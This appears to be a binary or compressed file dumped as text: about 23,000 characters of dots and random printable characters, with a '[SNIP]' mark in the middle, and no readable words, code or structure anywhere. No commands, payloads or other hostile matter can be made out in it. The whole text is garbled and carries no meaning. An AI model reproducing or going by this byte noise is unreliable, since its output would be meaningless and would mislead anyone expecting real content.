..8.f..#.k.n.....4E.....d.6..+.......&..{).....7..G....h.;9IP>...".)A...=..h...:b...I...O...>..a....(.................z.yI ..2.q4M.:A..KO*_....i..X.4.\X..........^D....v...R.r.)QWF.ZG1....`...p>.!R;.w..Q....p.z.2..z.....p.[......q.>C.+.)S...*BP....J...~..........R%..........c..u@..Z..%.....J..3.O.."[}..)^..CC...../....zd/.. .\.?.%.V@{1.....W#@.......N..\/.X...:.O0G|...:.Q... ...:j*.F.....m[E\4b.{..|.kKK".pvk/1.T.&    .....i.>.\..f.2...<..$.7...#...TU..%.U.[."<4../..J}..x.3.u..9O....n....l.0...}.3...yd..O".4W.......w.@[..F....JQ.hm.q|;.....*...>%.^.......c.UM...i.Y1w.6..'......    v....V..U...NIv.F;A..~=y..t...}...'...w;.......<.....C....C4.I...v.....G4.s=B.m..*..`.Sn..Q..h.....O'...j...F.b8.u.<...0..3.......]..r='.Q.....=.vP...y |.M_.....F..hC..8:2S....^_.ZL.~..M.....h..(.q.n..}a..U...l.6......9.r.
.~~....M...` v...k..(.T....N...Lz|;...T.#[......n....-:....0_!.q...........>    M..cw    ..uk.bg..R.........5..%.m....)P.@*.d.. .^ee....|._;.z.Z.]d...._....i...$....p...>...^o.f..@.V..z..o...o.....f..$./..z/.5<....9M[R...h.B....WT.L.e.ze..n....6.47...i{...a.%.....Y...._..H...O.MWP!.....,.)X.....("P..........7.....................7....B..`.8C9]...|..........D8...m.Bn..;.4..#H[.^n..i...~.@a.}.....v.Y#*.....Ms2...=...;l..Y...!...d..1.[...<.f.`i..F...<...f..+.`.....t.K`5....n..
...~..+W..e.]....&...Q"..........Q.7_4P..m;UL.<......./$...^...1|..(.J.y...........?!..\....Lg...........xT...d.zx"._6Q.....O...hv....0..T.{.o..%..b...L.v.3..*5.II.l+.+..irL.&?Iq%.W8...#=...*:.=...4..g~\.xL..l..
.g.!.dB...:K.^1........K...~.yR.D...q..... ....SM......uN
.N.g.R.(...B......1.9..V.,..c...DG.K..Q.Y.7..L.Q... ..S.P......YN8..
......?....+Z~.n......m..."..Q5.N=H.A...oz;.*.........X.[,l......T>6A..i.`y.,.2..%@.:D...).v.6~.,.-t..K<N.V...O.......e.v...p.d#.Z......;36.e<.M.R.......q....P.?n..E.wd...{..T8d._>Rh1W........Y.@......ur>...; t$..>.......b...l..PQe.$..1!.6..R.a..ryU..8...X..3......;...........=);..<..Oz.J.kB]......P.=^..F......L..l._..j..*.]9.4nN.E......0=..=....aS|..K...:..'.~..S..qZw.A..{.0y...z.c.K...E..,........f )..s.K.{..n.3x......(un.[.k..........S...    ..+..k.X...`.....G.......E.1......ri.9. j@,.......;+|^....b.e.c:.3T. .....4.'.k.z...'..]|.V;......".,q...\Q....Q...}nNsw.....C.`.<....m...J...#.q>].h:w.A..%....|.....uL....%..pW.VSn.....R\`M*m..WsX........T.o ..    ..$........S......."#x8.E...6..6...C.......u.S'fo.....|...eJ.....C.(........$i*......[e...]Z.e.. g..TfWE.i^.f..p..(....a......tp..q..D..2Aw.wN.+....r.L...Db....1..d.tl...Rf..q}.../.h,.....?...F~.........
c_{..D.............06.g..u..|.3...I...C..*...3...*...#E..N...@...~....eq....h...1f.O....k..=....R@%.6A../.~`...7U9I..p..x.%w..V..._.;I..{...4....\%....y..9.5.RV..j......{..w....\.....    ,?I.*.4t.....M.n..{.....E.'.t.g].......8.W.6.`...*....K.....9t.:.X........X.b..36AP.....4%b.Lz]...NdfvS&[..hz.(T.} .SS..1..V.UD.R...6.y7.....q...}..<..m.W...T..........REt2.....%f...4./....h..,..U....j.."=....[*.L.XAlf..@....y..8//0..)....+t....^.M.-)R.bY.a;d........R.
<.....[.....iKe..    ).8..L..0...y..Ec...7h^.Ww
2.e^...g5..mV.B...
...f....+.?.oDw;.....LqBC|>.J.ip.j.I..K..G[.k.OM*M...../=}h.kgm...[.|...F..U
R.z0.v$.#P......bu!..F...f...K...x.'...L......>...d.}{..Gh.....Y........(......t:.-bk..ZI.h:U...*i..yh.^-$)`C;."l./Gj.,..P?..f.-.vv.:..$........{.............jZe.'*....j..<...J..O....].DD..W".....m...!b.c.U...e...}o.L..Xcj....u.R.l.E..`........K.2.."z6%q....D...a.R..X....]4    ;.&.6.q'...7J..)|Q@/N.X.}r.nc..q.?@.xJ..1..5........0S4.[3.....:..@.R....K.-...x.....D=c...    B..)r.........)..-....%n..{..*...@f.*.].-}....7...R.....l.~..........`...(.$..y3."..z.H......`^........c.#]n.5RnG..Tx..`=....N...N...O,.6.uy.    e...........
..*.-..M.U7.&Q..p@Tp......... ...l..#7C..C.....M.I?P......5m....6..BRf....)h."t.ZPK..$0ZX.Jp....'~I8...k.....T.H.,...o..S...U...9...I...NS'$..:..".)O.....1_.    ...P...d.V%%pb.yZ.....3I..D+......N.xI..5.56......D|..qpB.......l&.I...?r..^W[.    J.v.L..a4Do.0{....r....rcDn....biR......^w..f..K.&.&Ct..b.i........`...'..5n/..}...t\.=....3+|....D..O.a6.]e...|...%P...]..n%.8.%.z...%..-...%h.S.Y|.?UvR'.d.m.8.b.q...1.aB...g.....B.|b"w..."........k|u\..X..l.......8.p...jC<....R?b9.6a..Z?.,.lk..1( .s..K..$..3.....@.T.A/.Od...HZ........VK..mH0.Nx..x4.q.N..........zjy..!.^...jY..s.._.x..[_.....U8..&.....S.........;..1.42.6....y..VWd`........?.....K.:.-l:...hB..=..X>.6.F.>z..q[.^.0......u..E........?.M._O...=...-q.W?w...d;.8...N.B...W.    .....&......36..I.j...%.f..'.$o.d.H.`W......2A...xO.....b..o..;.....5.i..A.v.r..+..Y8.G......'f.v.j..W.^w.......J...pgz`.......ST....|5...JK...(..*.....y....M.T.[.}..?.%8.H...=N.......M..".....ZS..M.2.A:..3...`u.`.W+...-..s...ai.....)jfD....,...R7.;s.@;j.r..{.4.0.>.b...~.WI.....,....D.9......."....c~J.....V.v.W).#..../....tI@.<.Q.'.|E.p.Z.6.C......*......8...    a...j....`..C.......wb.N..0...._z..y.foc.O......~m.<_.#[.GS...s;.Do..Z........\.....Hw;...;..................4.I,...~9.    ...8..;1.._.
H...l.rAQSmU..].sfF.!......T......j.e..]..........1...?....E.......0...hA..LG.O...)    ..+..=tx..:.....~.......R..K..~........"!............,t.Y.G.JS#a[........5!.Z.IE..M.%......1.........0..2.2.....t8.V.~......+.E..x.I.N....3Mk7...B|]._....QQ$OB............\..^.1E.v.&m.I....v.... .>....Z...1'../bhw..e..W..^.e_......[M[b0..._......\.).N.......kJ.H.P..N.h._.....O..a..Q....K..B..nE......nD.R.    p...l)..wD..Y.M.w......Vi...'./..x...'X...nh....".../S`.C.F T.n....fD.<.........d....`..s...u..<.o..`c.:B...../...i,.W.*.q.lj.D(.WxjOSH.%W.......y.!...lm.L/8...M_....w..o...Xqb.........}o%. ..3yE....`!R.....5r4A...y....H...b..]vM..->.$7..?......p;..%Y.PK..H.    d..:Qf.....8l...*....b..I.N...Y?...O#&r.....0.}....Oe#.;9C.H..%a\.....I.r...h.$6....3v....S2....o.q......@e..n4.u.&.G...*..<r........C..7......3.......}&BH...4[.a..p...=C...S.~..5.....
{.q..A........!...4"..v^...?>,....$.W..L}..C....m..N'~^..s....j...se.c.y....c.8j.+;..........+2A7Ro..e.-..J..o...a..P..3.!9..Q...+;...__'$..............]..Aqpu{..R....u~.d.cl|.%...0tW`.`....9..%^+.?....3.[q.......;...{&.wz..D..d
...[SNIP]...
<.p....B..(.UR.!..]R;.
...<%......7.\1...
LS..P9......>.Ie(W4.;'.....+.,...}...h.L../|..H.......8.#..
...M|.V..+Y ......6.....ia=.0......\.VI    $>.p-!...z.K'jH.]....S~`...G..L.....E."....[..).u.9X.-........R`@..3....X.....E..F...H.p..uUVT"Z8..ACB......?..bc...0......R...j\w...q.........-k.4..7K".)s....&..WnE.8..5.W...5w...
.....
:.'...?..O.U...!v....p...GE...kF........7g...=...a.. ...95_.....7&....0..I...<..e..w.3.....I.X.i.?......p>Q:s.....=.I.>.s..|.S.%bC...{...)..%2.F.RT)./._.....) .(...=e.I....H...i.`..O.N._.n.sq.....i.T...^H...Z......l....p8[..w....#.1..'..l}....[.KB..V...H.@..<....qU..\...\.L.....1...p.m....6'....'R....s....zxW<.S.-...G
0%....p..l....C..c..\V`......*,..w.... .......n..p...O..[o.D......EyC[.g..f.hi..` .....\..h...s^....1...M.QxE..&.VR..{25.-j.X:.h......w.N..RlNBc.t`......G.n.]..#pr.z.)..>..G!.V..tv{...    ...{P...H.Ll.....l.f.\.<.....5.@...f...T:<.w...L...wcSL.?\.LMa.:.M..XP."w.....J.?$...|.M......~...n<6.y.u    ....S..?....D.r.k
....S.=(..........wh.8c:l6:c+...].
.O..........l.w@....<..Q..k.\.$4...0..    .,...e.d....x;.=O.D....h.Mc.....H..S.[.....m3...[.V........wJ.yJ1.G..5.m.....
.YW..j,e.3lF.}..3.....J1]V.x..&t.oU0.P.......s.#....Q).1........`AK..M../+...9.V...yf..#.h...[W...p.I4x..hY..... @.w.{|e....l\.*..H)9.p..6JMm..3.....T1..G ....U..f..z.......f7$;\....|`...S.IL..-...'U..D....8z....3$m.m.._..bN&u....T<..s.nW.0k.z-G.].....&u...$M.J\....^....v.;_.3.....&..}........N..c=...."C..)[.WH...W.._..m...y....a.rV.L.....r.a....A..\.=M..O)>...A....Z.x.$d...5|..e.^.Z.....C...$O....C....[...-..-..6r.....7
...\.M...7.........Z.............Y...r....h...j._..).... ..D..?....t..>..tP.Y..'
..1.x..S`.T&...$.h..{.
..Q.    .
.ip.........TT...}..9....X._....
.../jz.    .....M.....|Tt.oKa.....\s.'2...../2.."nP..V..`...a.^...hxnF_.gY.Pw.A8...x.<|....k7.......sH..p..[.7.2.>g..+,...Nc.......C.c..@I..\M..$W.n:o..i..81)%.....7..z../..b<....y%..hF.K|P.%^.K.h9..B\8...6.$.....6.rO...m.'...3.......}.a/6?...}...K}!/..`%p._@-!s..Q..........k..kZ...    ..t.`v....a.d.....;..3|.}....=.....\..ZQ<{....f.?..T.F..g...Y.....LTe`..vN...m..{....}.c. .....w.I".O.X.4m.!.f.55d...I.....5.n3WxYR..z.........8r.\...R....?]m...9.....D...."..?1....x2.B...IZ...........~.%....p<.7g.(.7..[..t...r....<<q.M..Y....v.......-.$.    .s...e<.1F.....&....Xn.....Y...0j&..+...V#..t.U.l....T..?.]..S...G.g._4Q}4...NC."bon>..)Xl....*..X....*Z..=].....! Me.@...
.....q.mo'M{D.'......N.u.p..T..+....99..i..f.$..P.%*....;5......fx..s8......".8T_3.|.{..._<...*c_c.NH\~......mR;..'.^..'.|....?..^.O.....z/.'~r.....c..v...p....%...[.o.a...........v~.
4...L...R.......i.1
'UE..XK.c....C........[M.1.l,'8......s..\..h..m.M:..x.T.q.G.....:....w....~s.q 'Nj.9+i.......y.@<..    ..|.....N7a.S.E....rt...........(....A..W....d8....y.."<Z._...SjA=x{.%/..IV....jaA..]...H..Ir.e8r...Z...B......e.T........:q.;.....f.I.bf...s....}........`Bi..XL5{....V._....$;g.,...1...[L._.2..Mu{...]......o.q_u4......q.;..Etk..T........Dt.....Q,..Z\..9.[....P...K    ..T........[..Qa.5+'.i.+....<:....l.
.Q..'.VRTp..~.;~.g...4...k.<......\....xK%...[d.$..Z.|...?
.2&.(+C.....EW....3.h.@...b...\.M.m.$..n..9"...N...1.k.....;r..L....ZIa~."{d~..(...!B..tEBI.Juy.1.@.7.......~.!R.Y...;...k=..)..{.2/....@..jt....L....eh.5w..Y.9(Z....$.h$S...SkT;..V.... O.-..d..k..$...Y..:$......V.q...'.B..a.....a.'.........9.u...=,...!..s...:..c.A.......{.    ...;.C58~...,/m..U2(fYL*..#.,.c.fH....v/(....,n
2...*../.......ttM..}.?........>g6........^....^o/.V|...r....g...v...6.M......C.XSE......iy......S."...zm.b...F..V..o.[.v.......b.1.y...3Y(.B..=...=..Q7.j+)...3..`.k..V.fra..Dg"..:.....HG.>r...Cr....-......u....|#.D.`...w.4........p.r.p..........a..}.3H...t.fcj.s.-..]@m...BT......W3..........%...9"|):.u.bi    m..l]..J......n..@.)9.u.[M.|...v^L.. ..>;.T.w.....a9T..m.A.Q..._ya&.T.A.{.=....h......j..v@.....Yt.....|...?.".....r....o...(    ."M..._..iZm...N.fJ.J.@,..}.v....gb..$.%?..(.....<d.in!..|{.|@Q.X.P    .....)..........v.k...k.e.i"X.wW#...O_.~...<.$......]n....[...!_)...(.0.J...C......\..[.>.}.....ep.d...v.......!.~G.$x....4.GSO.?...U..6...[..T.......2.W....C........
d0.Yp...sn.&.L>.|..&...y....>...U.E....W..].u..K.....U.4U=.$....I...N.E..e.*...6................V.#.YuRh..G..Vwr..{fp...ar.....V p...y.......16C%..D&..c..H...(....]/..^+.Ln..S....Y.0.dp.....q.B...u..V.b..T.T...^..5......(..a..V[..%..Y.u.b.AO..l..[..7.A....$......
.n....\...e2.W...!k.....tx..b.    ..#3D.N.9.X.`...z(.~.@U.[....i5..j.....}y._.y....{.....P._...._..<...C..C.d.c.m...\,S........i..........[V.B...D...v.....u...~....Q...R.....|.k...`v.k<...w..2.....    ....$.i..b.8......1..S.3....)....I.B.....v..._.PF.:/1".....b..R.8~.......e..-..|....J"-m..n.o1.....U....-P.F.f.Ux.{R.q..z
..c.E5.Z....c..-...-R.B:..Me.)P.+C.^6v>']>....&...T&...ZAJ.X..g`..u.U.;K...Pf.v.E.......;..E.E..?..nhB..P7.....-v1T..............t.....Y>.?.....=.x.qv`..JzX...
.x................d.........a.W.....*3..,_...O...G....'.d.n.Z..:.6.Q..s.~.-.a\u.........-2.L.X..........?P..........].....!...EGZ.B.b3!...CLDJ.cVV    \..;..8.F........".v..
_..uE..=..........;......6P..tb..r...Q....7.).."......f5..t..0...^Z.}.jW.C^.....I8...V..r.~..@CF.63. O..T(......0....&.A....4.]....sd....=X.3..tc..^....B.kn.bp...K.7..,.b.)#]q..~.?..2.$..~.r..$.../...$N..b$5J70...<..O.K.{p.+W..8...\p.........o....o.....L0dn.f....K    V.(.,4X+.....Dkz.*x.7...,,.hOU.....{3...+`.q........m.Q..gm...k..#.*....<.]..w.}7..f..
...e^KAL..Tt.[..7.........gzO.L.P..........7.>d...9.C.x|&.j.%o..w$.."#c.M..R..T.+. ..U....|.O+"...H    ...hlF.F.    bJ!D.B....4..{...A.nV.V>.m.........[.K.+&E...[.    ..T)?......3..#j....).....".l)*^.W.........g.:.+.e}....Z1......!hr....;......[.w.....<...R...    .KzysY".d..d.<.&.......    =w].....m.#..}.j.S..5T.Q.....Vl4.<qN....r...c...I..6/E>;....A.)o..MS.&......z....G.Z[.=8P...~..T9.Z.R..g.*..@U.Q..^4..    G...~.......]P...OW.F.;....O{....[.\cA..+@u......r./...p5.....h...3......v.........i_.'YhJ.5.W$.S......
......J.y&.65.0.........>]..t.._.PvT.%B=.....d.G.4.. ;..M..c.@e..\
.@.^~..F..W=R....$^......X..-...W28..yU.Q.z6#M{......Tq`...u...z3......g%.^d..|............_.[...Y.)...F.3...#..X....K    ED^\.u..
>3.:..=.F...Y..}.R.f...k...S../It5..G...`.......?.f.g...8W.4s.Q%.;.M@L.y.z......L@..n.-.....^Q...`.....u.&7.B<..9...>n..q!..y...-....HUyQ%t\.3|........b...`.E.me.).gC. ...s.tZ........c>...J.k*..wxW..].hx.....[>..h..(*1.P.k.D.J.R.J....dg.T.)..O.....J.RL
..).....$.Pl......vf.YR....#.Tp.............?.s...Tm.    W#v?..iJ...Y ai2.    ~....vy+. ,....N...5i..c..l..`.4P.........Q....S.d.....Gh..3\.U...l..P.P.XO.c~...
...c.$a.D.}.........|qW...I...;eCf..B.#?....)..p.P..F...j..).Q..m.d^.. }K...z.F...x.J-....Is........y./..k:..T..;cV..l..B9..0B.<.:E...g..c.{QO..#..'....m7........|.c...uY......zA...7.......%.....)....V.'..X...~....pq..On.........A....l.W....|. ...C.............-.....G..&......q.......q[....G#z-.....F..^,RM..(..F    A...?M....!..-.8.>.....e!e....=................{..mq.o`.&..Av....Gb.#.`..;'v......d}.
.Pp.F,..T.d..d.R3..    ..1..J..J+...E._D..Yb..B.....^ue..p.Iz..........P..c....n/.........mfOx27>y..-./.....TA.7.A..D.......2..i.Ca..5% n...)....
..d.$V.}....UR..MT[.S...?ET..`.4...&...........n..d.....J..5..9..H.*...]+......`.U..{%..0....9q._..RA..J.i.;.......:..%.u...a.....(.....*s........c..
....9....h.`R....M...Q..G...S..C....2}..WZ.O q.)4.;C.K&..6.!a..[.A.z......w..v..bvJ......kX.am.>C.2....vT..3..5.O...F${'......<X..D..A.C..Bi..;...Y.... .f..j.D?W.!$..9J..V......,.0.P...u&l Q.........|..a...YI.f.3R    ..x.#.,.......Aa].ikHS....e........%....J..;..:....".R..X.....q"L...|)NcA8.E.&.....u--.RG...s..B.=..2...g.$....CK;Z.|......;.....k..@..D.!vo..}^.mK.................:6...P*..d_........9..O..5#+..j..C.N.@.....9o...........6:.@.......q{..5C.x.....&^:.B..i/..p@.R#.)    .U...............N\`y..b.}..7...H..p..C.
,....".c.v.u.9:..f.{.0b.3...?T.9.rXlJ.......y..8lq.../.    km..\N....z..>...S=.....C...s......b....xi.......z..2.#.f.SKIi.qg..&OM.b.....bp....&.NFM1.L|9<.AM...8......f^...G.&`.&"...}Q..v}.5.)...=NTj.....Z.9~..t....`..r3..e].@pLS.....2.y...Hk.......F.1.I..v....j.....6..T;...h....A.y.#....e..W..;.U..P`.c.....J..<..;.C...t.j.E.........h3......^.H.........6.B.VU..-NH9\..(.....*K....:..zef....C.....Z.[..._...t..........\.C... .ZJe'.|.~/6>...N+..TY./....T:.e..$.q.f.....y#...arg..|..k.ea1.ri.....#...Gs..j.
.Ef.H.Y....G..g..4..s?..X..=@wn....U..>_....a.q    .o...."......f.9*....Od}.......U3b.......{.2..2...<K.C..A`........Ev:.g..x.............J..o..Q..'.(.    ..."...8...$.5.>.".@..........$..pR..    .*......V.Q..).0b.I.Z.\.B...U..O.%...T..Z..R...72...c!]..^..8...4S.2.8.@#.!....s...m....D;.F.....3.._(..p.6p....U.QL.0..C..L$.....DP.=3.    ...~ g...;S._..<.k...j
....-....;.B.....u`.r.....y....f.E.L.PHQ..%[P...w.....).W|M.ho.%e......Q.[..O....7.4......k..6..}.........h3.I.t.....U3.U....$..bu.Q:.*.....@...4...0....'.1s.UH.>.6N..8<l..P...j..7A^.I...F..t..Z_..[...j....} ....8..K.i.....`..t...GO.:`..... $..r.......w..^x._...p    ..f..,.)j.Y.....x}=.......Y.6.>.^.=4.u
.!.....+.~.Z;.6.`!5{;.n!...D...&..
...$......D..>ag..'.g)A.A.=G.p.t......w..s>.y.?.Be...R...~]..oF'.....!._.[.m.Z+...D.u........2
..WlF^X:...C.........Q.F.EX    ..I&#"..f../{..(_.wm.,..=.=f.........s.[....wK.0.jZQV.sP.y.t...9.#.
....\.UkTt....Y.&.D..o@...h#.C>.F..................-.]3..{iLyA....NE5.4.7...X..HI\..i..0a.... ...........qj.+.Z..`....mil'~......7....bu....?.c.pn0....rN.f.......?.....rD.
...M.#.M<.. ...Z7.+..d..O.7    ..w..K...>.
#..\.{.YxE.j.X,D...'..?.vSf6&.6..C........$.T..I.<~....!.F%v...WJ.5.
Q.....<.*H^............(..]+....\Xp...e...n...../..#..+.Z0.E.W..y3:=....A.q.?........~.PR.W..#.y....>Sj..x!.q0.....^h.]l&-).?..=a.....^LP.L.....;..gW....w...&.c......7x.../.P....}b.;}..b...c.*6....}~...A.k..G.. .....".
.........'_."vS.$..{...T....l.-.`..c.4*.....].......o........bH..P....._..p.N.m.5...{0..x....&..;`..OO....H.N....C.I^..A.......-.......M...f/...4H.o.."..6;5...T.....'5..\....8#j3..kU......&..y.......K1.v3.4.-.
..Ve...Wx..L8(.......eC.35.^G5m..G.6T....pk"...q.+..+~.N..=    ...,?c]......O.(..........N}..;..K.F3......0(/.../..c.......:..b[N\....g.=.Q~..3...=...^2.~.C........n:6..d.........Z..U1..B.P.....
;..3...9w.ji..i..C...P...!.}.T.P8..rQ/.....f.J...-...e.a.A._
T...\.....b-.e{..`..o..E.NTH.A56..........g.z...3.QtB......6..@;A;(.P...p.9...v...Nq?26.....}....:...%..M.o'm.
9s.c.I.6G.E.dd.Dx^/...LG?NS.[....Q.c.9.C4b6..c=...o.AO........z......h...........a.(..y~m0.>P..Y.........a....N.B...Wj_...n^...I...pl................,^P.*N    ....mU._.    ..C......ne..d<\:\...$2....../..o..9,am&".=../bu.u
..`.|$).....2...vK../...}U....x..C..%......Mf..EH.&U...&+.G._...a....L.UN.f...B....R.NH.....    ..?B.?/.j.-....m..(AM.G.......}.5...zN....6g........U...W....yU}.|..._..l\y..^N>.a.cB5.....0..]`..%.1.................x.1..%..\...:....*..8..%...H.vhS..:|J.s...2..9gN....b..xb.Aj.....2...D.B.|..Q0......+~..:y.DU\~..V....m....;.3..x...O0....u.r.._.g..7to...m..)....<{.......\.:..14H.    .S<...P...j*.....2.o'L....+. .~..x<h.P...^5.|Q9.T..v.5+N....9......A.T......{@..............M...e...]%..).H..:.q.U@QO..+...9p,...V......e.
.....LD..[.....Wr....@...I1...)w.V.......<.".C..[/......z....e..b....B......Kd...[.~...(.Z.2....$Fd.......    .dsw...$...4..|.......F1r.u.Wz%m.....Rv.B...,.t..<u..$.0.."s..#...[.H.S.{.....u.fuB..R............^.'...<}..#f.&.............`.5d.0.&~.87...tX....
......(...l..........`...%!t.n.3 SL.m.bc.4.EnK.......Yt..6..x....K.g..`.;.^.9t..;,.......o.....)......4..G..%I8......E#..v..KA.g8.].....0......m.O.|...^R...f<d..i..G...o...4.<F....h..}..6......^,.~.1.......@.U....p... ..../.........g.....x.Y......$%.K./.?....0...0l......o^..V ..Q?.
.N.....(...S..~&......d-....f...aydC%^...BN....!...o/...T<f.....H)..G.~o.....    .
{.t.l^....Y.g...".\..T..6F ..y+V9.-.j.....Z.O..6v.Sz...3...WP...>Q.y.+.......y..?..?@O....;6D....9...m
+.x.&.....1...z6y..@.........(O.F.......N..o..1I.|.    ...NX.. 2..Wx.o...n......%..........KD.....V.)...w.]..
+..    ...1..%...X~......v..h....}}J...ZJ.).!c....Q..6...6.T0+.R}26).19....6m}..?..k...l.c..w....I...9x....nFbm...[b!......;ox...a..nY..I.-....ue..n...................xO..[..1By..@o...h.4}...N..Ndh..X,.3d.0.9.v.../i[......}    ..i&c}.rL,........(....Fj..E.....wLY....3Q.]..../.h.!e...]S..Q.s.|....G...m..{..uY3.U..+....Z6l.9.W|g..).).....$..Bau....t.Z5....4.(...d...X.|wL..y.}^...1WDf[.........hM..A....G.5.a)`.....'n.k;..0.^.......y.*....KF.8..^.m....h9Z.."....9..P...Q.5tP[....GI.M."7.W...yb..~lw.D.......;HSL<7.V$G.E....pC..{Q.......BK.j&Y.....    .Q....F.3.r
.K..;....i.....Y....#OT.u.K..#. .*.I..........+.`n..5.2..!'
..
>pXz..o....0o!O.....Y$..y..h.<.%/f......40.M3".[9%....H...> .....    B...H9.M.....~.Cu..O(Q.c..>....^...%.....&.....f..(E..*+...~.....'.A...t...L...~_..o.m...mDiRz...J.Dz.G[}.........b8.I... =..<.D....Wd.~..j.kJl'. @!"..w.. v......f....4...>..Z..^...W...S..#.....WOx1c..}.....I.x.M.YY!w..^..Y..gF.'v.;...Mq......uEQ.W.....-5....j~. ..`fZ.................'vh:|`.7,...e..R...5+.XW..S7!..4@.t....X..I    .(W.c.v*3?.=.s..y.[tIY.
..5l.B..(..........y.......e.....o.rx..v...+a    ....E.M.<...... H..!,.}.[`....#.m.....1......n..4.,m7]*.....:|NBu.".C...G.O!.r.9........DF&..F.f..<m...)...28t24t..5.'4.B..F....Q.N.._TF.w.4.(..x...YQ.+    ...%0:....N...69j...J-.7....."...v.M...o....5.0.u.*.H...\..~8....i)....A.*....@. AYt.l......B.A.......C...L1.a..'...[.I...O.u.Hlp.".E.P....9.+.....A...%]..4...#U7..Ly.qT.BrO...g.5.q.K.ur[..P.3..B..R|8...-......m..e.....o.>.....o\D`;*..uph.x.....[-.pO..L..........A.>]..-..o:9dU....c15..*.NM...\....w.]....!.L`,ic.*..j.c."....)7... ....V........e.....[.H.6...J2...d.....t4.5..0...........Y.!{.)z..cm.D=...5..e.v.@r.{.z..    .t.w.uL0.&q.pc...1.<..."M.2.m4.y<.f..k..6..._..V.8.s.>.Z.xS.. ^67gK.....N.1.j.k.~L...    .....pR..a(.Wq...[-.6......W..+...w}9....(pz..8...q...|......8C....'...?.l!_pr.e..\......!0...E~.5...D.OD.Ln.U.f..J*...[.[6...H.......#^b.....]..).......c.#t.t
8...i.....l......2U?..{...t7(.XK......2.P-.Dq;....B.Dm.*..37...H.7..C....W...I.`...}...T.)7d.6..'..f............,..x......a.....9
.?..Q.s{.....*D.69e.....[.J&0..d..2.J.x5S...f..Y+..#.A.....7.6..Bf.V.Uh!.D.....&..h. ..Fr.m.......$|.|!5..HC..PV.....(..u.....SP.h6HO.ss.b..)..~..3R...i.B.6..s..e...Zm=........ZT....Y..H..H.0x..|Rd......'.y..../....e|....a.=.Hj..of.|.C+^.Qo).o.1.....<...v..S..Q.....dYH.^....X..W.S.c...g..s..pen........Z\.8..~C.d..n. S..+....:.."....).y..../...T....].p..c....Y....V...'. nOJ:U.....wJ....Us.Y!0G+k%i...<B.;.D........n!..9.y....U0|up1...c.$R8.uR..2..$...n...chd..6o.f.4.B...B.....r.R..$.s..:,...$............2..J...v:.....\.Bj%%.z......l.)...........,.
T.2.HM.......E/....D.....>X...3.-.r...l.+..8......w*p.........4.l....Q.M..8lr>@..h....6.P.T<m."..m.Q.+.Z.u.<.n.>..2.^...%*.D.~8....O.=..H.....\Z.\D.aPW.v...`.].?..rla....D..J.f.[.(..YC.U}...e.P.1~O.j...'..G.s+...y1fHl.....v...#Q./.h.c}r=...5j.....hN.b.K.q.Q}......^...g7.X........e...    ...3...N.h1.Yc.}\
0....(......y\..lu#.b.8...lX(.....0..=e......W...o..w..]u}..#...!U,'..[.......W..x...w...K`.>.5.O....y"..n..N.....?.6eHw......G.*X.....'.!W....[..i..#@.......3(m.98./,]..B......:_@..]...@.ytP.]...C.x.
.#-.~...F....7..u.d..6.R.Pq7..xu..mm.g........b.C1j......zcb..r.....h..b..dJ .B.    ....8Q$*<...X.P..##+e.....N.S.<...'.mM...z.....{S......../..t-QS..8..l$.%.S..1.... P.)...:    f.H....IX(.h..7..>(\mt.....E..WN..G.@.^.+.z...9.6.......Z)..'T.&NXD.L..AO.}.2dN.D......F.L.....@D........eDq..].58...M...~e..x.p..[y..-w.B.h.)..J=s...=.]m{7.@..#K:...4....by..z.Vk{...O}.q..v...._-......-.H.x...R.c..l.h.....!....7......a.-..:U.o....vK....O...e@.m......L.G.vp.F.)...3p3..:.M:u42..I..Tas.+N...Py.ay;P..C...$....\....u.H...5..,u....d.<.DG.ag..._.C...h.^LF.Mv.G.6...]..o..AF.m.0u............8..    V..Q...X.+N..u...6]E.....R....+...5)8y.`..F1*.kh.0.O...n....p\..........0f...[q.....<.8..?_.
....<.....a..s.[...N.W....s[z.o.s.,..xX..Q    l;....mo..]j.....7L^u.O2qJ.
...>\,.{...Z:...    .ze.$....F^......... K..b....L.........4.q.!.....K.h`.M>2Z8...."
g.s.Eg@.u=~.}...%U).=.z..-.....Sc...[.D.1\0.Lx....+.. dP.
...t...I....j.n..9.*.'..M.#.@$.m..Wu..\..M...o.c...Jk...y...Y.J........z...KC$..8.A.Mu.....U..U.rT....-yA.d^.&A..K...CA..B.].Z..D..X.D-..SY%..v.~.t...h.$..?..@,<.*-...#..[..]XPA...K....0...8I{\X..6.\s.#`$.&.z.x..Y......w..~..He0..Z.....l.v...:l.../..^......K6.7.........v..j[S.7Yb........;&N....).z...h.J.7..z....rR.r..7i..D.Zs.....R....j(..<.....T`.U...X..z.'..W'E..C._....c.=.X..ZQ..W.....~.)..S..a....#...c....[..3..=):..-....9(....[[.C....9....(......vOY.0.T..q.g.+...[}.Wm:....6c..X|...t.+.V.i..~dZ...;.....g...G.p..)Oc.....@k..W..)Y..9R~.f...B..[.VX......m...9v..m...5...(..C.,........,......i.54O5K....g@...R..ZP8.9P...kW(.VJ.......z.W6.?..?..-.....$..D..k.j.4,..K...<{...H..(m..-.e.'VV..Ja.........J.gcS..j...u..{.i#..U.;o)...AU.Q....../g .G...`..Y. ....[6..h..sr.O....3Y;D^l.....Er.............+g/....n_k.(.C..k...yxH..3.gcm...........Z..?o.=vXc..g...|>..%V.yN&r,..:.Y.k}~.Dz...S...>..x.9\K7....Y..U...s...q(r.......1.'o..].-.>
:.O.`t...w8tH.C.....<..l.......!...R..m..7^...-...`..RVZ.........j...7..
~....3.....    E.....e.zc.^.....'.M.T._vd$.....ES    .H;.... ..
..%...u_.....q.G...vJ._...rX.kxu..lVu$R..Ya...7.V    .....{-.....>.....m.w;..4......9.^...z..V.....a..!
.9f........P...........Y...D..0s!r.C....y{^v.,.
?.......Zx$Q.....=1....h...k..sR.&.zI....H....u..o%'N.j.7Z.....D9.&=*..@.......B..i#z..9JFiS...v.vx!..@.9...|l.....h.........    ......Q..IH..J.)..f._y.....g
...c..Y=1u+y.S...dS...\..l.lI..H.ZT.T.&5..(.ZaC!.#}.d.F.rb`....W_.N/......y..r..RL..[V...p.[...J(a2...X.:mm......P.....u....0OJ...@...3...BG.{...B..(.d~i.b ..j@...s..r:Wh.\..~.h.I.....M...,.+.ny...jq.]c.....c..J..|!'..tji.,..    .{...<.p.r;lS...>...A`.8!n .....g..n`\..xS8$....1c...p. /.S.D.L.9.k.a.Gu/u.Ux;.....8.9.&[%..;....2.C."....<Il.....w]....8%.?.L$].....{...J..bb.0..t..x..4..lm....-.A..n.Bb    ...j....".......N....+.......2..iiB....................    r...g+..9x.....^..
.gWAS."v..p_..B.4..xV;2....o......q
